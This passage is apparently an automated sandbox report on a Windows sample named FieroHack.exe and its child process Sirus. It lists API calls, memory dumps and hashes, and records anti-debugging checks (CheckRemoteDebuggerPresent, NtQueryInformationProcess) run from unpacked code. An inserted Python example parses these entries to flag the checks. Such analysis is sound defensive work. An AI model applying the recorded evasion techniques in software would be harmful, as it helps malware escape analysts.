                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: Free$GlobalLibrary
                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                    • API String ID: 1100898210-3081826266
                                                    • Opcode ID: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                    • Instruction ID: eaa0fdc8f68cdeff62b7926931e70464fa678e679eb7ff43971a821d65c68845
                                                    • Opcode Fuzzy Hash: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                    • Instruction Fuzzy Hash: 20E08C335110205BC7613F54EA0471A77ECAF59B62F4A017EF8847B26087781C464A88
                                                    APIs
                                                    • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FieroHack.exe,C:\Users\user\Desktop\FieroHack.exe,80000000,00000003), ref: 00405ADC
                                                    • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FieroHack.exe,C:\Users\user\Desktop\FieroHack.exe,80000000,00000003), ref: 00405AEA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: CharPrevlstrlen
                                                    • String ID: C:\Users\user\Desktop
                                                    • API String ID: 2709904686-224404859
                                                    • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                    • Instruction ID: fbea36dfa466fa1ea2516b65251d52c814037185d06ce8b70eff5ee1363e4df1
                                                    • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                    • Instruction Fuzzy Hash: 73D0A7B25089706EFB0352509C00B8F6E88CF17300F0A04A3E080A7191C7B84C424BFD
                                                    APIs
                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405C1D
                                                    • CharNextA.USER32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C2E
                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                    • String ID:
                                                    • API String ID: 190613189-0
                                                    • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                    • Instruction ID: 0c44f0240925c5b75b39479a83fd13515cb2c3d3321eb5bdfbc953cb3faf5d46
                                                    • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                    • Instruction Fuzzy Hash: FBF0F631105A18FFDB12DFA4CD00D9EBBA8EF55350B2540B9E840F7210D634DE01AFA8

                                                    Execution Graph

                                                    Execution Coverage:15.1%
                                                    Dynamic/Decrypted Code Coverage:99.2%
                                                    Signature Coverage:2.3%
                                                    Total number of Nodes:513
                                                    Total number of Limit Nodes:34
                                                    execution_graph (rendered graph omitted; only the node data is recoverable): nodes fall in the regions 0x539xxxx, 0x5e1xxxx, 0x25bxxxx, 0x5bfxxxx, 0xc7dxxx and 0x76d9xxx. API calls named in the graph nodes: CallWindowProcW, GetClassInfoW, SetWindowLongW, CreateWindowExW, PostMessageW, SendMessageW, SetWindowTextW, GetConsoleWindow, CreateActCtxA, CheckRemoteDebuggerPresent (node 25b12dc) and NtQueryInformationProcess (nodes 25b21bd and 25b220c).
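The execution graph above names CheckRemoteDebuggerPresent and NtQueryInformationProcess among the sample's calls, and each per-function listing in this report records calls as `Name.MODULE(args), ref: ADDR` entries. The following Python is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses such entries, groups them by module, and flags the debugger-detection APIs together with whether the call site lies in a PE-backed dump. The input lines are constructed from entries on this page (the CheckRemoteDebuggerPresent line is built from execution-graph node 25b12dc with unresolved arguments); the anti-analysis API table and the "highest dump base at or below the address" region heuristic are this example's own assumptions.

```python
"""Added example: parse Joe Sandbox 'APIs' entries and flag debugger checks.

Not part of the Joe Sandbox report or of the analysed sample. Input lines are
constructed from entries visible on this page; the ANTI_ANALYSIS table and the
REGIONS heuristic are assumptions made for this example.
"""
import re
from collections import defaultdict

# One report entry looks like: "• Name.MODULE(arg,arg,...), ref: ADDR"
API_LINE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>[A-Z0-9]+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Assumption: APIs whose presence usually indicates debugger/sandbox detection.
ANTI_ANALYSIS = {
    "IsDebuggerPresent": "PEB BeingDebugged check",
    "CheckRemoteDebuggerPresent": "debugger attached to process",
    "NtQueryInformationProcess": "ProcessDebugPort / ProcessDebugFlags query",
}

# Dump bases from this report's 'Memory Dump Source' lines, mapped to whether
# the dump is backed by the on-disk PE image ("based on PE").
# Assumption: a call site belongs to the highest base at or below its address.
REGIONS = {0x400000: True, 0x25B0000: False, 0x5BF0000: False}

# Constructed input: lines copied from this page, plus a CheckRemoteDebuggerPresent
# entry built from execution-graph node 25b12dc (arguments unresolved).
SAMPLE = r"""
APIs
• FreeLibrary.KERNEL32(?,74DF3410,00000000,C:\Users\user\AppData\Local\Temp\,0040384D,00403667,?,?,00000007,00000009,0000000B), ref: 0040388F
• GlobalFree.KERNEL32(?), ref: 00403896
• lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
• lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405C1D
• CharNextA.USER32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C2E
• NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 025B2272
• CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 025B12DC
"""


def parse_api_lines(text):
    """Return one dict per API entry; lines that are not entries (headings) are skipped."""
    entries = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw_args = m["args"]
        args = [a.strip() for a in raw_args.split(",")] if raw_args else []
        entries.append({
            "api": m["api"],
            "module": m["module"],
            "args": args,
            "ref": int(m["ref"], 16),
        })
    return entries


def region_of(ref):
    """(base, pe_backed) for the dump region containing a call site, or None."""
    candidates = [base for base in REGIONS if base <= ref]
    if not candidates:
        return None
    base = max(candidates)
    return base, REGIONS[base]


def flag_anti_analysis(entries):
    """List (api, ref, reason, pe_backed) for every anti-analysis call observed."""
    flagged = []
    for e in entries:
        if e["api"] in ANTI_ANALYSIS:
            region = region_of(e["ref"])
            pe_backed = region[1] if region else None
            flagged.append((e["api"], e["ref"], ANTI_ANALYSIS[e["api"]], pe_backed))
    return flagged


def calls_by_module(entries):
    """Group API names by the module the report attributes them to."""
    grouped = defaultdict(list)
    for e in entries:
        grouped[e["module"]].append(e["api"])
    return dict(grouped)


def unresolved_args(entry):
    """Number of arguments the sandbox could not resolve (shown as '?')."""
    return sum(1 for a in entry["args"] if a == "?")


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for api, ref, reason, pe_backed in flag_anti_analysis(parsed):
        where = "PE-backed image" if pe_backed else "non-PE (unpacked/dynamic) region"
        print(f"{api:<28} @ {ref:08X}  {reason}  [{where}]")
```

Run against the constructed lines, both debugger checks resolve to the 0x25B0000 dump, which this report marks "based on PE: false": the checks sit in code that was unpacked or generated at runtime rather than in the on-disk image, which is consistent with the high dynamic/decrypted code coverage reported above. The ANTI_ANALYSIS table is deliberately short; extend it from the page's own signature list rather than guessing.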

                                                    Control-flow Graph

                                                    control_flow_graph (rendered graph omitted; the executed/not-executed colouring is not recoverable): basic blocks 5bf18c0 through 5bf1cf8, including the loop 5bf1930-5bf1938 and the tail 5bf1cf2-5bf1cf8.
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (y$d%dq$d%dq$$^q$$^q
                                                    • API String ID: 0-2238165116
                                                    • Opcode ID: 2a3413fdf579af746ccd63c1c7eda554dc9a975f8dccef2d7af24b0583174194
                                                    • Instruction ID: 6fd0f041a5abc2e275c57a81cb44d033a26fd562f69881738b68cb1a7fb8ccc9
                                                    • Opcode Fuzzy Hash: 2a3413fdf579af746ccd63c1c7eda554dc9a975f8dccef2d7af24b0583174194
                                                    • Instruction Fuzzy Hash: 3EC12874E00219DFDB14CFA9C880A9EBBF6BF89301F6085A9D519AB354DB34A956CF40

                                                    Control-flow Graph

                                                    control_flow_graph (rendered graph omitted; the executed/not-executed colouring is not recoverable): basic blocks 5bf18b1 through 5bf1cf8, including the loop 5bf1930-5bf1938 and the tail 5bf1cf2-5bf1cf8.
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (y$d%dq$d%dq$$^q
                                                    • API String ID: 0-3353541897
                                                    • Opcode ID: e5919fe7c3c9eee72897181387913a3876b4c2b18d5b617793d8bb944e5dc720
                                                    • Instruction ID: 8b41d2b19b6f175ac5a4d49f8a4373f5ad3140f5284966d85f4bbffc3a411230
                                                    • Opcode Fuzzy Hash: e5919fe7c3c9eee72897181387913a3876b4c2b18d5b617793d8bb944e5dc720
                                                    • Instruction Fuzzy Hash: 6CC12974E00218DFDB14CFA9C840A9EBBF6BF89301F6085A9D519EB355EB349956CF40
                                                    APIs
                                                    • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 025B2272
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1976305200.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_25b0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: InformationProcessQuery
                                                    • String ID: U
                                                    • API String ID: 1778838933-3372436214
                                                    • Opcode ID: b11b4aa0ba9da0aab3da760ff6827d75b0bdf778a09fe1384b62a95a085ed90a
                                                    • Instruction ID: c1d20603ecb9d727d213b4365b7ae7792f0875abe8d9b3bf84483e26c6bab11c
                                                    • Opcode Fuzzy Hash: b11b4aa0ba9da0aab3da760ff6827d75b0bdf778a09fe1384b62a95a085ed90a
                                                    • Instruction Fuzzy Hash: D14199B8D002589FCF10CFA9D980ADEFBB1BF49310F10A42AE919B7250D735A945CF68
                                                    APIs
                                                    • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 025B2272
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1976305200.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_25b0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: InformationProcessQuery
                                                    • String ID: U
                                                    • API String ID: 1778838933-3372436214
                                                    • Opcode ID: 76992bb4b84503d756f1642b80facb6b7d8f29fb745a43acb87fdef5dd3aba83
                                                    • Instruction ID: d6c10e10f34e7a56a4e7398d8137f1cb1bf507ca9124e6066eca8af477f57492
                                                    • Opcode Fuzzy Hash: 76992bb4b84503d756f1642b80facb6b7d8f29fb745a43acb87fdef5dd3aba83
                                                    • Instruction Fuzzy Hash: CF4178B8D042589FCF10CFA9D984ADEFBB1BF49310F10942AE819B7250D735A945CF69
                                                    APIs
                                                    • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 025B1332
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1976305200.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_25b0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: CheckDebuggerPresentRemote
                                                    • String ID: U
                                                    • API String ID: 3662101638-3372436214
                                                    • Opcode ID: c111b9d2975367f2f75b605d12a4d9ad729a6293a42757703451eb2a069a77da
                                                    • Instruction ID: 3d94b84b2773168f0ee634eda029b6e726965fb30d539928eb70cf17d7bd5cb1
                                                    • Opcode Fuzzy Hash: c111b9d2975367f2f75b605d12a4d9ad729a6293a42757703451eb2a069a77da
                                                    • Instruction Fuzzy Hash: 5741CDB5D052589FCB00CFA9D484AEEFBF4BF49310F24946AE459B7240D738AA45CF68
                                                    APIs
                                                    • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 025B1332
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1976305200.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_25b0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: CheckDebuggerPresentRemote
                                                    • String ID: U
                                                    • API String ID: 3662101638-3372436214
                                                    • Opcode ID: 52ef0beb78529dc12ab6c32aa5a66ff18406cb957578ca2135de74ca282874af
                                                    • Instruction ID: a9b2f80a66f05f55bd006195c1c9f879fcc83464a8982c371b7d13007c9c9635
                                                    • Opcode Fuzzy Hash: 52ef0beb78529dc12ab6c32aa5a66ff18406cb957578ca2135de74ca282874af
                                                    • Instruction Fuzzy Hash: 7941CDB5D052589FCB00CFA9D484AEEFBF0BF49310F24946AE459B7240D738AA45CF68
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1976305200.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_25b0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5343e066af29eccc48b095a3afaeb2e3bccb304c0617ae15287db76ad53636d0
                                                    • Instruction ID: fe47acf48706958dc86c3ce3389cfcc9072853a6712f9d6dccf32fe205878ba6
                                                    • Opcode Fuzzy Hash: 5343e066af29eccc48b095a3afaeb2e3bccb304c0617ae15287db76ad53636d0
                                                    • Instruction Fuzzy Hash: 746233B4901205CFE701DF98C68CAAABFBAFF05315F55E458E0086B656C779E888CF58
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1976305200.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_25b0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 857f7e761c77466b223b25b3c34a1a3a3c61922c9ba9390f16f7dc77c0aaa432
                                                    • Instruction ID: f4e10ef54b8f6fbca1cfe9250a23c11547ef84b9c34ef38c37cbaff21bafbfa4
                                                    • Opcode Fuzzy Hash: 857f7e761c77466b223b25b3c34a1a3a3c61922c9ba9390f16f7dc77c0aaa432
                                                    • Instruction Fuzzy Hash: 4321B174C49208EBDB06DFA4D4847FEBBB9BF46304F50A594D00477241E7746A4ADF58
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1976305200.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_25b0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 80a434924f547aef594573fc551599c8d6750d85a19cead4f2b11db327ab0bd0
                                                    • Instruction ID: 7ec82af6fd296a73b6a393474d3ecc2d0af0e7a9a22b3569e66f315387f9e54b
                                                    • Opcode Fuzzy Hash: 80a434924f547aef594573fc551599c8d6750d85a19cead4f2b11db327ab0bd0
                                                    • Instruction Fuzzy Hash: 7A214F74D4A208EAD706DFA4D4847FEB7B9AF46304F50A494D00973241EB745A49DF5C

                                                    Control-flow Graph (rendered graph not reproduced; node and edge dump omitted)
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Hbq$Hbq$Hbq$Hbq$Hbq
                                                    • API String ID: 0-1677660839
                                                    • Opcode ID: ec3f7e382839754793cfca84b30243a9e391dc51b3e361f051e9160667611863
                                                    • Instruction ID: c301b9159cd3df26e7c323298e264956fbcdeffe58feea4af54f30e8007166a4
                                                    • Opcode Fuzzy Hash: ec3f7e382839754793cfca84b30243a9e391dc51b3e361f051e9160667611863
                                                    • Instruction Fuzzy Hash: B5B18B74B002048FDB18EBB9C4549AE77E2FFC9351B2444A9D906AB390DF35ED46CB61

                                                    Control-flow Graph (rendered graph not reproduced; node and edge dump omitted)
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Hbq$Hbq$U
                                                    • API String ID: 0-221850694
                                                    • Opcode ID: b66d08ec4dcaccce99a4a63fedfdcfd63aecdf4c1d2cf59679371833b7cd3e00
                                                    • Instruction ID: 8d793a40624b6f24b11ec3182f99e41ff0b4c4bb0ec652de6e918fd82066a923
                                                    • Opcode Fuzzy Hash: b66d08ec4dcaccce99a4a63fedfdcfd63aecdf4c1d2cf59679371833b7cd3e00
                                                    • Instruction Fuzzy Hash: 62912874E003488FDB15DFA9C894AAEBBF6FF89300F24806AD519AB351DB34A945CF51

                                                    Control-flow Graph (rendered graph not reproduced; node and edge dump omitted)
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 05398651
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979107600.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5390000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID: U
                                                    • API String ID: 716092398-3372436214
                                                    • Opcode ID: a3527d9f1c6b95cdda019c1e4bf6c3f53499153bd544823c21d6d0497494b1bb
                                                    • Instruction ID: 40ad5b37f0d15a034479ae8c8f9e97d5ed088cdd3d4d8f696520ac77a1a8a3f8
                                                    • Opcode Fuzzy Hash: a3527d9f1c6b95cdda019c1e4bf6c3f53499153bd544823c21d6d0497494b1bb
                                                    • Instruction Fuzzy Hash: 4B81EEB5D053689FDF11CFA9C884ACEBBF1BF4A304F14909AE458AB221D7349985CF45

                                                    Control-flow Graph (rendered graph not reproduced; node and edge dump omitted)
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 05398651
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979107600.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5390000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID: U
                                                    • API String ID: 716092398-3372436214
                                                    • Opcode ID: 9e131ceff1d53beba4d86c18fc659aea6d1f1a740b036d462cb58134e04fe36e
                                                    • Instruction ID: c5b99208cb700c64b2178f7b6832288b7f0a23b8b2769e91ee5d6f1717be6255
                                                    • Opcode Fuzzy Hash: 9e131ceff1d53beba4d86c18fc659aea6d1f1a740b036d462cb58134e04fe36e
                                                    • Instruction Fuzzy Hash: 7B719BB4D00218DFCF20CFA9C984BDEFBB1BB4A304F5091AAE518A7211D7709A85CF45

                                                    Control-flow Graph (rendered graph not reproduced; node and edge dump omitted)
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 05398651
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979107600.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5390000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID: U
                                                    • API String ID: 716092398-3372436214
                                                    • Opcode ID: f65b63fb7315d9c1aeaada5ccd330217b04c6efaaa2605049cdc992ea2eff09d
                                                    • Instruction ID: 2da95d7529109333dbf7578d514f07bed84c2f4e66afeab05a1773ed3f6749f9
                                                    • Opcode Fuzzy Hash: f65b63fb7315d9c1aeaada5ccd330217b04c6efaaa2605049cdc992ea2eff09d
                                                    • Instruction Fuzzy Hash: 0E719BB4D04258DFDF20CFA9C984B9EFBB1BB4A304F1091AAE518A7211D770AA85CF45
                                                    APIs
                                                    • PostMessageW.USER32(?,?,00000000,?), ref: 05E18213
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979586094.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5e10000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID: U
                                                    • API String ID: 410705778-3372436214
                                                    • Opcode ID: 6f9ad9374518e30ab92f5ed8e7aee037f05382933a7f8620d05cd40eadd758cb
                                                    • Instruction ID: c48714d80c20c9617436ed574289ba531be766697903fa192e9c869ea8146552
                                                    • Opcode Fuzzy Hash: 6f9ad9374518e30ab92f5ed8e7aee037f05382933a7f8620d05cd40eadd758cb
                                                    • Instruction Fuzzy Hash: EC4147B9D083889FCB11CFA8D841A9DBFF1BB0A300F15A09AE844BB262D3749904CB55
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 025BC5D1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1976305200.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_25b0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID: U
                                                    • API String ID: 2289755597-3372436214
                                                    • Opcode ID: a1b64de992d15dede539d58c657714f2131e1b8146d2c37abc2d1a7cd8a7e2d3
                                                    • Instruction ID: 630b108e20ee9531e910e015c766888e254acea8c872b47329c10e3842e5c991
                                                    • Opcode Fuzzy Hash: a1b64de992d15dede539d58c657714f2131e1b8146d2c37abc2d1a7cd8a7e2d3
                                                    • Instruction Fuzzy Hash: C351D4B1D002198FDB21DFA8C841BDEBBF5BF49304F1084AAD509BB251DB716A89CF95
                                                    APIs
                                                    • SendMessageW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 05E197DB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979586094.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5e10000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: U
                                                    • API String ID: 3850602802-3372436214
                                                    • Opcode ID: 2a3249c52a541ca430250b4bbff472f88702d14c7419906b1c152829dc6ddcc8
                                                    • Instruction ID: f7779be6bcdfc32477a94b64b3ff53eda4e18b282871510a3d2061a7662caf62
                                                    • Opcode Fuzzy Hash: 2a3249c52a541ca430250b4bbff472f88702d14c7419906b1c152829dc6ddcc8
                                                    • Instruction Fuzzy Hash: E3410275D042489FCB10CFA9D484ADEBBF5FF49310F24905AE819A7311D731A945CF94
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 025BC5D1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1976305200.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_25b0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID: U
                                                    • API String ID: 2289755597-3372436214
                                                    • Opcode ID: 3191404dcd6460a29c25c46a04075d1c83684e7cd15becd9f4484d2a588ddf01
                                                    • Instruction ID: 298cf8a9eed15a23d80dd337a64e9520430f652979c995d54427a8721679ba45
                                                    • Opcode Fuzzy Hash: 3191404dcd6460a29c25c46a04075d1c83684e7cd15becd9f4484d2a588ddf01
                                                    • Instruction Fuzzy Hash: D551E5B0D002198FDB21DFA8C841BDEBBF5BF49304F1084AAD519BB251DB716A89CF95
                                                    APIs
                                                    • GetClassInfoW.USER32(?,?,?), ref: 05E1A418
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979586094.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5e10000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: ClassInfo
                                                    • String ID: U
                                                    • API String ID: 3534257612-3372436214
                                                    • Opcode ID: 8afe9a81fd62aca38af47e14a9bac3032724d9618250f2446300ccc583911ff4
                                                    • Instruction ID: 06ac0dd081b3fa17ba4b67d08d7215232a041214a211083d03ae268a799d0780
                                                    • Opcode Fuzzy Hash: 8afe9a81fd62aca38af47e14a9bac3032724d9618250f2446300ccc583911ff4
                                                    • Instruction Fuzzy Hash: 3351DDB4D093988FDB01CFA9C488A9DBFF1BF09314F1480AAE858AB251D334A945CF55
                                                    APIs
                                                    • GetClassInfoW.USER32(?,?,?), ref: 05E1A418
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979586094.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5e10000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: ClassInfo
                                                    • String ID: U
                                                    • API String ID: 3534257612-3372436214
                                                    • Opcode ID: b31738fc6da3a5ed89935ce6c2b6f63bfdd7b7a726d5a7899875d42b630d7342
                                                    • Instruction ID: 1e7ff90b8d806e645efe3cf9b88b45c989b422a5cee8c907b6ee71dd5c08cd05
                                                    • Opcode Fuzzy Hash: b31738fc6da3a5ed89935ce6c2b6f63bfdd7b7a726d5a7899875d42b630d7342
                                                    • Instruction Fuzzy Hash: 794188B4D01258DFDB10CFA9D484AEEFBF5BB48314F14902AE858BB250D374AA85CF94
                                                    APIs
